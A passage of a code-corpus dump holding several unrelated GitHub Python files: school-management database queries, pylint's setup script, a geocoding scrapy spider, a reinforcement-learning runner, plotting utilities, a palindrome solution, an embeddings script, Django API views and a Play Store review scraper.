mentor[3], mentor[4],\n mentor[5], mentor[6], mentor[7]])\n n += 1\n data.commit()\n data.close()\n return mentors_details_list\n\n @staticmethod\n def average_grade_for_student():\n \"\"\"\n Method display average grade for choosen student\n\n\n Return:\n average grade for student\n\n \"\"\"\n options = ui.Ui.get_inputs([\"\"], \"Enter the number of student to see his average grade\")\n\n data = sqlite3.connect(\"program.db\")\n cursor = data.cursor()\n records = cursor.execute(\"SELECT COUNT(`Name`) FROM `User` WHERE `User_Type` = 'student'\")\n records = records.fetchall()\n number_of_records = int(records[0][0])\n\n if int(options[0]) < 1 or int(options[0]) > number_of_records:\n print(\"There is no such student on the list\")\n return\n\n average_grade_list = []\n cursor.execute(\"SELECT * FROM `User` WHERE `User_type`='student'\")\n students = cursor.fetchall()\n student_id = students[int(options[0]) - 1][0]\n student_name = students[int(options[0]) - 1][1]\n student_surname = students[int(options[0]) - 1][2]\n record = cursor.execute(\"SELECT AVG(Grade) FROM `Submission` WHERE `Grade` IS NOT NULL AND `ID_Student`='{}'\"\n .format(student_id))\n record = record.fetchall()\n average_grade = int(record[0][0])\n average_grade_list.append([student_name, student_surname, average_grade])\n data.commit()\n data.close()\n return average_grade_list\n\n\n @staticmethod\n def which_mentor_is_a_monster():\n \"\"\"\n Method display checkpoint cards statistics of mentors\n\n\n Return:\n list with card statistics\n\n \"\"\"\n list_to_print = []\n cards_statistics = {}\n mentors = []\n data = sqlite3.connect(\"program.db\")\n cursor = data.cursor()\n cards = cursor.execute(\"SELECT `Name`, `Surname`, `Card` \"\n \"FROM `Checkpoint_submittion` \"\n \"INNER JOIN `User` ON Checkpoint_submittion.ID_Mentor = User.ID \")\n cards = cards.fetchall()\n for row in cards:\n name_surname = str(row[0]) + ' ' + str(row[1])\n cards_statistics[name_surname] = [0, 0, 0] #Cards [red,yellow,green] # row[1]- surname change for name,surname or ID_Mentor\n mentors.append(name_surname)\n mentors = list(set(mentors))\n for mentor in mentors:\n for row in cards:\n if str(row[0]) + ' ' + str(row[1]) == mentor:\n if str(row[2]) == 'red':\n cards_statistics[mentor][0] += 1\n if str(row[2]) == 'yellow':\n cards_statistics[mentor][1] += 1\n if str(row[2]) == 'green':\n cards_statistics[mentor][2] += 1\n for key, value in cards_statistics.items():\n temp = [key, value[0], value[1], value[2]]\n list_to_print.append(temp)\n data.commit()\n data.close()\n return list_to_print\n\n @staticmethod\n def grades_stats_for_mentors():\n \"\"\"\n Method display how many assignment mentor graded and what is his average grade\n\n\n Return:\n list with grade statistics\n\n \"\"\"\n grades_statistics = []\n data = sqlite3.connect(\"program.db\")\n cursor = data.cursor()\n grades = cursor.execute(\"SELECT `Name`, `Surname`, COUNT(`Grade`), AVG(`Grade`)\"\n \"FROM `Submission` INNER JOIN `User` ON `Submission`.ID_Mentor = User.ID\"\n \" GROUP BY `Name`\")\n list_to_print = []\n grades = grades.fetchall()\n for row in grades:\n grades_statistics.append(row)\n for row in grades_statistics:\n list_to_print.append([row[0], row[1], row[2], row[3]])\n return list_to_print\n\n @staticmethod\n def full_stats_for_students():\n\n student_stats = []\n data = sqlite3.connect(\"program.db\")\n cursor = data.cursor()\n grades = cursor.execute(\"SELECT `Name`, `Surname`, COUNT(`Grade`), AVG(`Grade`)\"\n \"FROM `Submission` INNER JOIN `User` ON `Submission`.ID_Student = User.ID\"\n \" GROUP BY `Name`\")\n grades = grades.fetchall()\n for row in grades:\n student_stats.append(row)\n list_to_print = []\n for row in student_stats:\n list_to_print.append([row[0], row[1], row[2], row[3]])\n return list_to_print\n\n # # TODO: return list with percent of attendance for every student...\n # presence = cursor.execute(\"SELECT `Name`, `Surname`, COUNT(CASE WHEN Presence = 1 THEN 1 ELSE NULL END)\"\n # \" FROM `Attendance` \"\n # \"INNER JOIN `User` ON Attendance.ID_Student = User.ID \"\n # \"GROUP BY `Name`\")\n # presence = presence.fetchall()\n #\n # percent_of_attendance = []\n #\n # for row in presence:\n # percent_of_attendance.append(row)\n # print (percent_of_attendance)\n #\n # number_of_all_day = cursor.execute(\"SELECT `Name`, `Surname`, COUNT(Presence)\"\n # \" FROM `Attendance` \"\n # \"INNER JOIN `User` ON Attendance.ID_Student = User.ID \"\n # \"GROUP BY `Name`\")\n #\n # number_of_all_day = number_of_all_day.fetchall()\n # for number in number_of_all_day:\n # for index, element in enumerate(percent_of_attendance):\n # if number[0] == element[0] and number[1] == element[1]:\n # percent_of_attendance[index][2] = str((element[0][2]/int(number[2])) * 100)\n #\n # print (percent_of_attendance)","repo_name":"BlakPolak/SchoolManagmentSystem","sub_path":"user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":39967,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"65"} +{"seq_id":"38365688125","text":"from __future__ import absolute_import, print_function\n__docformat__ = \"restructuredtext en\"\n\nimport os\nimport sys\nimport shutil\nfrom os.path import isdir, exists, join\n\ntry:\n from setuptools import setup\n from setuptools.command import easy_install as easy_install_lib\n from setuptools.command import install_lib\n USE_SETUPTOOLS = 1\nexcept ImportError:\n from distutils.core import setup\n from distutils.command import install_lib\n USE_SETUPTOOLS = 0\n easy_install_lib = None\n\nfrom distutils.command.build_py import build_py\n\n\nbase_dir = os.path.dirname(__file__)\n\n__pkginfo__ = {}\nwith open(os.path.join(base_dir, \"pylint\", \"__pkginfo__.py\")) as f:\n exec(f.read(), __pkginfo__)\nmodname = __pkginfo__['modname']\ndistname = __pkginfo__.get('distname', modname)\nscripts = __pkginfo__.get('scripts', [])\ndata_files = __pkginfo__.get('data_files', None)\ninclude_dirs = __pkginfo__.get('include_dirs', [])\next_modules = __pkginfo__.get('ext_modules', None)\ninstall_requires = __pkginfo__.get('install_requires', None)\ndependency_links = __pkginfo__.get('dependency_links', [])\nextras_require = __pkginfo__.get('extras_require', {})\n\nreadme_path = join(base_dir, 'README.rst')\nif exists(readme_path):\n with open(readme_path) as stream:\n long_description = stream.read()\nelse:\n long_description = ''\n\n\ndef ensure_scripts(linux_scripts):\n \"\"\"Creates the proper script names required for each platform\n (taken from 4Suite)\n \"\"\"\n from distutils import util\n if util.get_platform()[:3] == 'win':\n return linux_scripts + [script + '.bat' for script in linux_scripts]\n return linux_scripts\n\n\ndef get_packages(directory, prefix):\n \"\"\"return a list of subpackages for the given directory\"\"\"\n result = []\n for package in os.listdir(directory):\n absfile = join(directory, package)\n if isdir(absfile):\n if exists(join(absfile, '__init__.py')):\n if prefix:\n result.append('%s.%s' % (prefix, package))\n else:\n result.append(package)\n result += get_packages(absfile, result[-1])\n return result\n\n\ndef _filter_tests(files):\n testdir = join('pylint', 'test')\n return [f for f in files if testdir not in f]\n\n\nclass MyInstallLib(install_lib.install_lib):\n \"\"\"extend install_lib command to handle package __init__.py and\n include_dirs variable if necessary\n \"\"\"\n def run(self):\n \"\"\"overridden from install_lib class\"\"\"\n install_lib.install_lib.run(self)\n # manually install included directories if any\n if include_dirs:\n for directory in include_dirs:\n dest = join(self.install_dir, directory)\n if sys.version_info >= (3, 0):\n exclude = {'invalid_encoded_data*', 'unknown_encoding*'}\n else:\n exclude = set()\n shutil.rmtree(dest, ignore_errors=True)\n shutil.copytree(directory, dest,\n ignore=shutil.ignore_patterns(*exclude))\n\n # override this since pip/easy_install attempt to byte compile test data\n # files, some of them being syntactically wrong by design, and this scares\n # the end-user\n def byte_compile(self, files):\n files = _filter_tests(files)\n install_lib.install_lib.byte_compile(self, files)\n\n\nif easy_install_lib:\n class easy_install(easy_install_lib.easy_install):\n # override this since pip/easy_install attempt to byte compile\n # test data files, some of them being syntactically wrong by design,\n # and this scares the end-user\n def byte_compile(self, files):\n files = _filter_tests(files)\n easy_install_lib.easy_install.byte_compile(self, files)\n\n\ndef install(**kwargs):\n \"\"\"setup entry point\"\"\"\n if USE_SETUPTOOLS:\n if '--force-manifest' in sys.argv:\n sys.argv.remove('--force-manifest')\n packages = [modname] + get_packages(join(base_dir, 'pylint'), modname)\n if USE_SETUPTOOLS:\n if install_requires:\n kwargs['install_requires'] = install_requires\n kwargs['dependency_links'] = dependency_links\n kwargs['entry_points'] = {'console_scripts': [\n 'pylint = pylint:run_pylint',\n 'epylint = pylint:run_epylint',\n 'pyreverse = pylint:run_pyreverse',\n 'symilar = pylint:run_symilar',\n ]}\n kwargs['packages'] = packages\n cmdclass = {'install_lib': MyInstallLib,\n 'build_py': build_py}\n if easy_install_lib:\n cmdclass['easy_install'] = easy_install\n return setup(name=distname,\n version=__pkginfo__['version'],\n license=__pkginfo__['license'],\n description=__pkginfo__['description'],\n long_description=long_description,\n author=__pkginfo__['author'],\n author_email=__pkginfo__['author_email'],\n url=__pkginfo__['web'],\n scripts=ensure_scripts(scripts),\n classifiers=__pkginfo__['classifiers'],\n data_files=data_files,\n ext_modules=ext_modules,\n cmdclass=cmdclass,\n extras_require=extras_require,\n test_suite='test',\n python_requires='>=3.4.*',\n setup_requires=['pytest-runner'],\n tests_require=['pytest'],\n **kwargs)\n\nif __name__ == '__main__':\n install()\n","repo_name":"gtt116/vimrc","sub_path":"vim/bundle/python-mode/submodules/pylint/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":5549,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"65"} +{"seq_id":"30142100033","text":"import scrapy\nfrom scrapy.shell import inspect_response\nfrom urllib import parse\nfrom os import environ\nfrom urllib.request import urlopen\nimport json\n\napi_key = environ.get('GMAPS_API_KEY')\n\nclass NaganoSpider(scrapy.Spider):\n \n name = \"nagano\"\n\n start_urls = [\n 'http://nagano-akiyabank.jp/search/'\n ]\n\n def parse(self, response):\n for item in response.css('.rakuenakiyaBukken'):\n images = item.css('.photoBox img::attr(src)').getall()\n price = int(float(item.css('.price .num::text').get()) * 10000)\n location_raw = item.css('h3 a::text').get()\n\n location_url = f\"https://maps.googleapis.com/maps/api/geocode/json?address={parse.quote(location_raw)}&key={api_key}\"\n location_data = json.load(urlopen(location_url))['results'][0]\n coordinates = location_data['geometry']['location']\n url = \"http://nagano-akiyabank.jp\" + item.css('h3 a::attr(href)').get()\n\n yield {\n \"locationRaw\": location_raw,\n \"longitude\": coordinates['lng'],\n \"latitude\": coordinates['lat'],\n \"price\": price,\n \"url\": url,\n \"image1\": images[0],\n \"image2\": images[1],\n \"image3\": images[2],\n }\n ","repo_name":"Greycastle/akiyan","sub_path":"scraper/nagano.py","file_name":"nagano.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"6045313924","text":"import sys\nimport multiprocessing\nimport os.path as osp\nimport gym\nfrom collections import defaultdict\nimport tensorflow as tf\nimport numpy as np\n\nfrom baselines.common.vec_env.vec_video_recorder import VecVideoRecorder\nfrom baselines.common.vec_env.vec_frame_stack import VecFrameStack\nfrom baselines.common.cmd_util import common_arg_parser, parse_unknown_args, make_vec_env, make_env\nfrom baselines.common.tf_util import get_session\nfrom baselines import logger\nfrom importlib import import_module\n\nfrom car_environment import CarEnvironment\n\nfrom baselines.common.vec_env.vec_normalize import VecNormalize\n\ntry:\n from mpi4py import MPI\nexcept ImportError:\n MPI = None\n\ntry:\n import pybullet_envs\nexcept ImportError:\n pybullet_envs = None\n\ntry:\n import roboschool\nexcept ImportError:\n roboschool = None\n\ndef train(args, extra_args):\n\n env_type = 'car-environment'\n print('env_type: {}'.format(env_type))\n\n total_timesteps = int(args.num_timesteps)\n seed = args.seed\n\n learn = get_learn_function(args.alg)\n alg_kwargs = {}\n alg_kwargs.update(extra_args)\n\n env = build_env(args)\n \n if args.network:\n alg_kwargs['network'] = args.network\n else:\n if alg_kwargs.get('network') is None:\n alg_kwargs['network'] = get_default_network(env_type)\n\n print('Training {} on {} with arguments \\n{}'.format(args.alg, env_type, alg_kwargs))\n\n model = learn(\n env=env,\n seed=seed,\n total_timesteps=total_timesteps,\n **alg_kwargs\n )\n\n return model, env\n\n\ndef build_env(args):\n ncpu = multiprocessing.cpu_count()\n if sys.platform == 'darwin': ncpu //= 2\n nenv = args.num_env or ncpu\n alg = args.alg\n seed = args.seed\n\n config = tf.ConfigProto(allow_soft_placement=True,\n intra_op_parallelism_threads=1,\n inter_op_parallelism_threads=1)\n config.gpu_options.allow_growth = True\n get_session(config=config)\n\n\n env = CarEnvironment()\n\n return env\n\n\ndef get_default_network(env_type):\n if env_type in {'atari', 'retro','car-environment'}:\n return 'cnn'\n else:\n return 'mlp'\n\ndef get_alg_module(alg, submodule=None):\n submodule = submodule or alg\n # first try to import the alg module from baselines\n alg_module = import_module('.'.join([ alg, submodule]))\n return alg_module\n\n\ndef get_learn_function(alg):\n return get_alg_module(alg).learn\n\n\ndef get_learn_function_defaults(alg, env_type):\n try:\n alg_defaults = get_alg_module(alg, 'defaults')\n kwargs = getattr(alg_defaults, env_type)()\n except (ImportError, AttributeError):\n kwargs = {}\n return kwargs\n\n\n\ndef parse_cmdline_kwargs(args):\n '''\n convert a list of '='-spaced command-line arguments to a dictionary, evaluating python objects when possible\n '''\n def parse(v):\n\n assert isinstance(v, str)\n try:\n return eval(v)\n except (NameError, SyntaxError):\n return v\n\n return {k: parse(v) for k,v in parse_unknown_args(args).items()}\n\n\n\ndef main(args):\n # configure logger, disable logging in child MPI processes (with rank > 0)\n\n arg_parser = common_arg_parser()\n args, unknown_args = arg_parser.parse_known_args(args)\n extra_args = parse_cmdline_kwargs(unknown_args)\n\n if MPI is None or MPI.COMM_WORLD.Get_rank() == 0:\n rank = 0\n logger.configure()\n else:\n logger.configure(format_strs=[])\n rank = MPI.COMM_WORLD.Get_rank()\n\n model, env = train(args, extra_args)\n env.close()\n\n if args.save_path is not None and rank == 0:\n save_path = osp.expanduser(args.save_path)\n model.save(save_path)\n\n if args.play:\n logger.log(\"Running trained model\")\n env = build_env(args)\n obs = env.reset()\n def initialize_placeholders(nlstm=128,**kwargs):\n return np.zeros((args.num_env or 1, 2*nlstm)), np.zeros((1))\n state, dones = initialize_placeholders(**extra_args)\n while True:\n actions, _, state, _ = model.step(obs,S=state, M=dones)\n obs, _, done, _ = env.step(actions)\n env.render()\n done = done.any() if isinstance(done, np.ndarray) else done\n\n if done:\n obs = env.reset()\n\n env.close()\n\n return model\n\nif __name__ == '__main__':\n main(sys.argv)\n","repo_name":"habichta/AirSimCarKerasRLEnvironment","sub_path":"OpenAISelfDrivingCar/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":4397,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"65"} +{"seq_id":"7145884528","text":"import json\nimport logging\nfrom pathlib import Path\nfrom typing import Any, Dict, List\n\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport seaborn as sns\nfrom sklearn.metrics import mean_absolute_error as mae\nfrom sklearn.metrics import mean_squared_error as mse\nfrom sklearn.metrics import r2_score\n\nfrom ndj_pipeline import utils\n\n# Hack to get plots working correctly on command line\ntry:\n if get_ipython().__class__.__name__ == \"ZMQInteractiveShell\": # type: ignore\n pass\nexcept NameError:\n matplotlib.use(\"agg\")\n\nfive_thirty_eight = [\n \"#30a2da\",\n \"#fc4f30\",\n \"#e5ae38\",\n \"#6d904f\",\n \"#8b8b8b\",\n]\n\nsns.set_palette(five_thirty_eight)\nsns.set(rc={\"figure.figsize\": (8, 5)})\n\n\ndef create_metrics_plot(results: pd.DataFrame, model_config: Dict[str, Any], name: str = \"\") -> None:\n \"\"\"Produce metrics and scatterplot for results table.\n\n No returns; saves assets to model folder.\n\n Args:\n results: DataFrame with \"Actual\" and \"Prediction\" columns\n model_config: Loaded model experiment config\n name: Simple label added to outputs, helpful to distinguish models\n \"\"\"\n # Metrics\n _r2 = r2_score(results[\"Actual\"], results[\"Predicted\"])\n _mae = mae(results[\"Actual\"], results[\"Predicted\"])\n _mse = mse(results[\"Actual\"], results[\"Predicted\"])\n\n metrics = {\"r2\": round(_r2, 2), \"mae\": round(_mae, 5), \"mse\": round(_mse, 5)}\n\n output_path = Path(utils.get_model_path(model_config), \"metrics.json\")\n with open(output_path, \"w\") as f:\n json.dump(metrics, f)\n\n # Plot\n plt.figure()\n plot_fig, plot_ax = plt.subplots()\n logging.debug(f\"Creating plot figure {name}\")\n\n metrics_text = \", \".join([f\"{name}: {result}\" for name, result in metrics.items()])\n title = f\"{name} - Predicted {model_config.get('target')} \\n {metrics_text}\"\n\n # Done to exclude very wild Predictions from plot, symetrically across the two sets\n lower_clip = model_config.get(\"plot_min_clip\", 0)\n upper_clip = model_config.get(\"plot_max_clip\", 1)\n lower_clip_actual = float(results[\"Actual\"].quantile(lower_clip))\n upper_clip_actual = float(results[\"Actual\"].quantile(upper_clip))\n lower_clip_predicted = float(results[\"Predicted\"].quantile(lower_clip))\n upper_clip_predicted = float(results[\"Predicted\"].quantile(upper_clip))\n lower_clip = min(lower_clip_actual, lower_clip_predicted)\n upper_clip = max(upper_clip_actual, upper_clip_predicted)\n results[\"Actual\"] = results[\"Actual\"].clip(lower=lower_clip, upper=upper_clip)\n results[\"Predicted\"] = results[\"Predicted\"].clip(lower=lower_clip, upper=upper_clip)\n results_min_max = [results.min().min(), results.max().max()]\n line_series = pd.Series(results_min_max, index=results_min_max)\n\n sns.scatterplot(data=results, x=\"Actual\", y=\"Predicted\", ax=plot_ax).set_title(title)\n sns.lineplot(data=line_series, color=\"orange\", ax=plot_ax)\n logging.debug(f\"Plot figure drawn {name}\")\n\n output_path = Path(utils.get_model_path(model_config), f\"plots_metrics_{name}.png\")\n logging.debug(f\"Saving plot to {output_path}\")\n plot_fig.savefig(output_path)\n plt.close(\"all\")\n\n\ndef create_univariate_plots(df: pd.DataFrame, reporting_features: List[str], model_config: Dict[str, Any]) -> None:\n \"\"\"Create scatterplots with linear fit for each feature against target.\n\n No returns; saves assets to model folder.\n\n Args:\n df: Full, feature rich dataframe, must contain config specified\n target, and numeric feature columns specified by `reporting_features`\n reporting_features: List of features to produce individual plots\n model_config: Loaded model experiment config\n \"\"\"\n df[reporting_features] = df[reporting_features].astype(float)\n\n # Limit sample, if too large this is really slow\n if df.shape[0] > 5000:\n data = df.sample(5000)\n else:\n data = df\n\n for feature in reporting_features:\n plt.figure()\n plot_fig, plot_ax = plt.subplots()\n\n title = f\"Univariate plot of {model_config['target']} and {feature}\"\n sns.regplot(data=data, y=model_config[\"target\"], x=feature, ax=plot_ax).set_title(title)\n\n # in case comes in from dummy variables\n feature = feature.replace(\"<\", \"\").replace(\">\", \"\")\n output_path = Path(utils.get_model_path(model_config), f\"plots_univariate_{feature}.png\")\n logging.info(f\"Saving to: {output_path}\")\n plot_fig.savefig(output_path)\n plt.close(\"all\")\n\n\ndef create_continuous_plots(df: pd.DataFrame, reporting_features: List[str], model_config: Dict[str, Any]) -> None:\n \"\"\"Create line plot to show how target varies according to feature.\n\n No returns; saves assets to model folder.\n\n Args:\n df: Full, feature rich dataframe, must contain config specified\n target, and numeric feature columns specified by `reporting_features`\n reporting_features: List of features to produce individual plots\n model_config: Loaded model experiment config\n \"\"\"\n df[reporting_features] = df[reporting_features].astype(float)\n\n for feature in reporting_features:\n plt.figure()\n plot_fig, plot_ax = plt.subplots()\n\n data = df.groupby(feature)[model_config[\"target\"]].mean()\n\n title = f\"Continuous plot of {model_config['target']} and {feature}\"\n sns.lineplot(data=data, ax=plot_ax).set_title(title)\n\n # in case comes in from dummy variables\n feature = feature.replace(\"<\", \"\").replace(\">\", \"\")\n output_path = Path(utils.get_model_path(model_config), f\"plots_continuous_{feature}.png\")\n logging.info(f\"Saving to: {output_path}\")\n plot_fig.savefig(output_path)\n plt.close(\"all\")\n\n\ndef create_correlation_matrix(df: pd.DataFrame, reporting_features: List[str], model_config: Dict[str, Any]) -> None:\n \"\"\"Create correlation matrix between subset of reported features.\n\n No returns; saves assets to model folder.\n\n Args:\n df: Full, feature rich dataframe, must contain config specified\n target, and numeric feature columns specified by `reporting_features`\n reporting_features: List of features to produce individual plots\n model_config: Loaded model experiment config\n \"\"\"\n plt.figure()\n\n corr_matrix = df[reporting_features].corr()\n for col in corr_matrix.columns:\n corr_matrix.loc[col, col] = corr_matrix[col].mean()\n\n # Check for problems\n if corr_matrix.isna().any().any():\n problem = corr_matrix.isna().sum().idxmax()\n logging.warning(f\"Problem with at least one feature column {problem}, no variation in corr matrix\")\n corr_matrix = corr_matrix.fillna(0)\n\n plot = sns.clustermap(corr_matrix)\n\n output_path = Path(utils.get_model_path(model_config), \"plots_correlation.png\")\n logging.info(f\"Saving plot to {output_path}\")\n plot.savefig(output_path)\n plt.close(\"all\")\n","repo_name":"ndjenkins85/ndj_cookie","sub_path":"ndj_pipeline/post.py","file_name":"post.py","file_ext":"py","file_size_in_byte":6943,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"65"} +{"seq_id":"503502497","text":"# Given a string s, return true if the s can be palindrome after deleting at most one character from it.\n\n# Example 1:\n# Input: s = \"aba\"\n# Output: true\n\n# Example 2:\n# Input: s = \"abca\"\n# Output: true\n# Explanation: You could delete the character 'c'.\n\n# Example 3:\n# Input: s = \"abc\"\n# Output: false\n \n# Constraints:\n# 1 <= s.length <= 105\n# s consists of lowercase English letters.\n\n\nclass Solution:\n \n @staticmethod\n def isPalindrome(str, s, e):\n while s bool:\n if s == s[::-1]:\n return True\n \n size = len(s)\n start = 0 \n end = size-1\n while start < end:\n if s[start] != s[end]:\n if(Solution.isPalindrome(s, start+1, end) or Solution.isPalindrome(s, start, end-1)):\n return True\n else:\n return False\n start +=1 \n end -=1\n \n return True\n \n\nobj = Solution()\n# result = obj.validPalindrome(\"abdcca\")\n# result = obj.validPalindrome(\"aguokepatgbnvfqmgmlcupuufxoohdfpgjdmysgvhmvffcnqxjjxqncffvmhvgsymdjgpfdhooxfuupuculmgmqfvnbgtapekouga\") #True\n# result = obj.validPalindrome(\"ebcbbececabbacecbbcbe\") # True\nresult = obj.validPalindrome(\"eeccccbebaeeabebccceea\") # False\nprint(result)\n\n\n","repo_name":"jahidmunna/leetcode","sub_path":"valid_palindromeii.py","file_name":"valid_palindromeii.py","file_ext":"py","file_size_in_byte":1448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"72632956046","text":"from datasets import load_dataset\nimport pandas as pd\nimport tiktoken\nfrom openai.embeddings_utils import get_embedding\nimport openai\nimport csv\n\n# openai.api_key = \"\"\n\n\"\"\"Helper methods to get texts and embedding\"\"\"\ndef output_dataset_to_csv(path=\"./recsim_ng/data/ag_news_train.csv\"):\n file = open(path, 'w')\n writer = csv.writer(file)\n # header line\n writer.writerow([\"text\", \"label\"])\n for item in load_dataset(\"ag_news\", split=\"train\"):\n data = [item[\"text\"], item[\"label\"]]\n writer.writerow(data)\n\ndef output_all_embedding_to_csv(num, path=\"./recsim_ng/data/ag_news_train.csv\"):\n embedding_model = \"text-embedding-ada-002\"\n embedding_encoding = \"cl100k_base\" # this the encoding for text-embedding-ada-002\n max_tokens = 8000 # the maximum for text-embedding-ada-002 is 8191\n df = pd.read_csv(path)\n # num = -1 means encodes all data to embeddings\n if num != -1:\n df = df[[\"text\", \"label\"]].tail(num*2) # first cut to first 2k entries, assuming less than half will be filtered out\n else:\n df = df[[\"text\", \"label\"]] \n\n encoding = tiktoken.get_encoding(embedding_encoding)\n\n # omit text that are too long to embed\n df[\"n_tokens\"] = df.text.apply(lambda x: len(encoding.encode(x)))\n if num != -1:\n df = df[df.n_tokens <= max_tokens].tail(num)\n else:\n df = df[df.n_tokens <= max_tokens]\n\n df[\"embedding\"] = df.text.apply(lambda x: get_embedding(x, engine=embedding_model))\n # Notice: the embedding has 1536 dimensions\n df.to_csv(\"./recsim_ng/data/ag_news_train_embeddings.csv\")\n\n","repo_name":"Xiayucheng1212/recsim_ng","sub_path":"recsim_ng/applications/low_cost_model/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":1585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"3644139297","text":"\"\"\"\nDocumentation : This module retrieves rss feed of a website \n in the form of a XML document\n\n\"\"\"\nimport urllib.request\ndef downloadXml():\n \"\"\"\n This function retrieves the xml document from the rss feed of \n a website and saves it locally\n \"\"\"\n url = \"http://feeds.feedburner.com/gadgets360-latest\"\n urllib.request.urlretrieve(url,'news_tech.xml')#Retrieve feed url and store it locally\n\ndownloadXml()\n","repo_name":"prakashmishra1598/ADBMS-CIA","sub_path":"rss_feed_download.py","file_name":"rss_feed_download.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"22359534535","text":"import django_rq\nimport yaml\nimport importlib.resources\nfrom django.http import Http404\nfrom drf_spectacular.types import OpenApiTypes\nfrom drf_spectacular.utils import (\n extend_schema_view,\n extend_schema,\n OpenApiParameter,\n)\nfrom rest_framework import viewsets, status\nfrom rest_framework.views import APIView\nfrom rest_framework.request import Request\nfrom rest_framework.response import Response\nfrom rq import job as rq_job\n\nfrom pinakes.common.serializers import TaskSerializer\nfrom pinakes.main.common import models\nfrom pinakes.main.common import serializers\nfrom pinakes.main.common import tasks\n\n\n@extend_schema_view(\n retrieve=extend_schema(\n description=\"Get an existing group\",\n ),\n list=extend_schema(\n description=\"List all groups\",\n ),\n)\nclass GroupViewSet(viewsets.ReadOnlyModelViewSet):\n serializer_class = serializers.GroupSerializer\n ordering = (\"name\",)\n\n def get_queryset(self):\n roles = self.request.GET.getlist(\"role\")\n if roles:\n queryset = models.Group.objects.filter(\n roles__name__in=roles\n ).distinct()\n else:\n queryset = models.Group.objects.all()\n return queryset\n\n\n@extend_schema_view(\n create=extend_schema(\n description=\"Sync groups from keycloak. Returns a background task id.\",\n responses={status.HTTP_200_OK: TaskSerializer},\n request=None,\n ),\n)\nclass GroupSyncViewSet(viewsets.ViewSet):\n def create(self, request: Request):\n job = django_rq.enqueue(tasks.sync_external_groups)\n serializer = TaskSerializer(job)\n return Response(serializer.data, status=status.HTTP_202_ACCEPTED)\n\n\n@extend_schema_view(\n retrieve=extend_schema(\n description=\"Get the status of a background task\",\n responses={status.HTTP_200_OK: TaskSerializer},\n parameters=[\n OpenApiParameter(\n \"id\",\n required=True,\n type=OpenApiTypes.UUID,\n location=OpenApiParameter.PATH,\n description=\"background task UUID\",\n ),\n ],\n ),\n)\nclass TaskViewSet(viewsets.ViewSet):\n def retrieve(self, request: Request, pk: str):\n try:\n job = rq_job.Job.fetch(pk, connection=django_rq.get_connection())\n except rq_job.NoSuchJobError:\n raise Http404\n return Response(TaskSerializer(job).data, status=status.HTTP_200_OK)\n\n\n@extend_schema_view(\n get=extend_schema(\n description=\"Get product and version info\",\n responses={status.HTTP_200_OK: serializers.AboutSerializer},\n ),\n)\nclass AboutView(APIView):\n \"\"\"View class for About\"\"\"\n\n def get(self, request, *args, **kwargs):\n \"\"\"Returns product and version info\"\"\"\n\n text = importlib.resources.read_text(\"pinakes\", \"about.yml\")\n about = yaml.safe_load(text)\n return Response(\n serializers.AboutSerializer(about).data,\n status=status.HTTP_200_OK,\n )\n","repo_name":"mkanoor/pinakes-something","sub_path":"pinakes/main/common/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3015,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"26693517276","text":"from typing import List\nimport numpy as np\nimport pandas as pd\nimport time\nfrom selenium import webdriver\nfrom selenium.common.exceptions import ElementNotVisibleException, NoSuchElementException, WebDriverException\nfrom bs4 import BeautifulSoup\nimport re\n\nclass app_reviews:\n \"\"\"\n Class definition of the webdriver used for reviews scrapping\n\n Parameters\n ----------\n driver : selenium.webdriver..webdriver.WebDriver\n a webdriver to be used\n url : str\n URL of the app\n lang : str\n driver locale, expected to be either 'cs' or 'en'\n\n Attributes\n ----------\n url : str\n URL of the app\n position : int\n latest position achieved using `move_it` method\n driver : selenium.webdriver..webdriver.WebDriver\n exposing the webdriver used for scrapping\n source : bs4.BeautifulSoup\n exposing the BeautifulSoup parsed webpage source\n delta: list of int\n scroll positions from last 5 moves\n \"\"\"\n\n def __init__(self, driver, url: str, lang: str = 'en') -> None:\n \"\"\"\n Starting own webdriver, initialize the scrapping of a new application\n \"\"\"\n self.url = url\n self.position = 0\n self.driver = driver\n self.driver.get(url)\n self.source = -1\n self.reset_delta()\n if lang in ['en', 'cs']:\n self.lang = lang\n else:\n raise ValueError(\"The lang is expected to be either 'cs' or 'en'\")\n #\n def move_to(self, pos: int) -> None:\n \"\"\"\n Move driver to a position defined by Y axis pixels\n\n Parameters\n ----------\n pos : int\n a pixel representation of the target position (scroll to)\n \"\"\"\n self.driver.execute_script(\"window.scrollTo(0, {to})\".format(to = pos))\n #\n def move_it(self, pos: int = -1, offset: int = 10000) -> None:\n \"\"\"\n Scroll further down, loading more reviews (via button click) if possible.\n Can be used for incremental scrolling.\n\n Parameters\n ----------\n pos : int\n a pixel representation of the original position (scroll from)\n offset : int\n a number of pixels to be scrolled down\n - should be large enough to hit the end of page\n \"\"\"\n try:\n next_button = self.driver.find_element_by_xpath('//div[@jsname=\"i3y3Ic\"]')\n next_button.click()\n except (NoSuchElementException, WebDriverException):\n if pos == -1:\n pos = self.position\n self.move_to(pos + offset)\n self.position = self.driver.execute_script(\"return window.pageYOffset;\")\n #\n def unwrap_reviews(self) -> None:\n \"\"\"\n Unwrap all shortened reviews\n Walks through the loaded reviews and clicks every 'Show full review' button\n \"\"\"\n self.move_to(0)\n unwrapped = self.driver.find_elements_by_xpath('//button[@jsname=\"gxjVle\"]')\n for click in unwrapped:\n try:\n click.click()\n except (ElementNotVisibleException, WebDriverException):\n pass\n #\n def 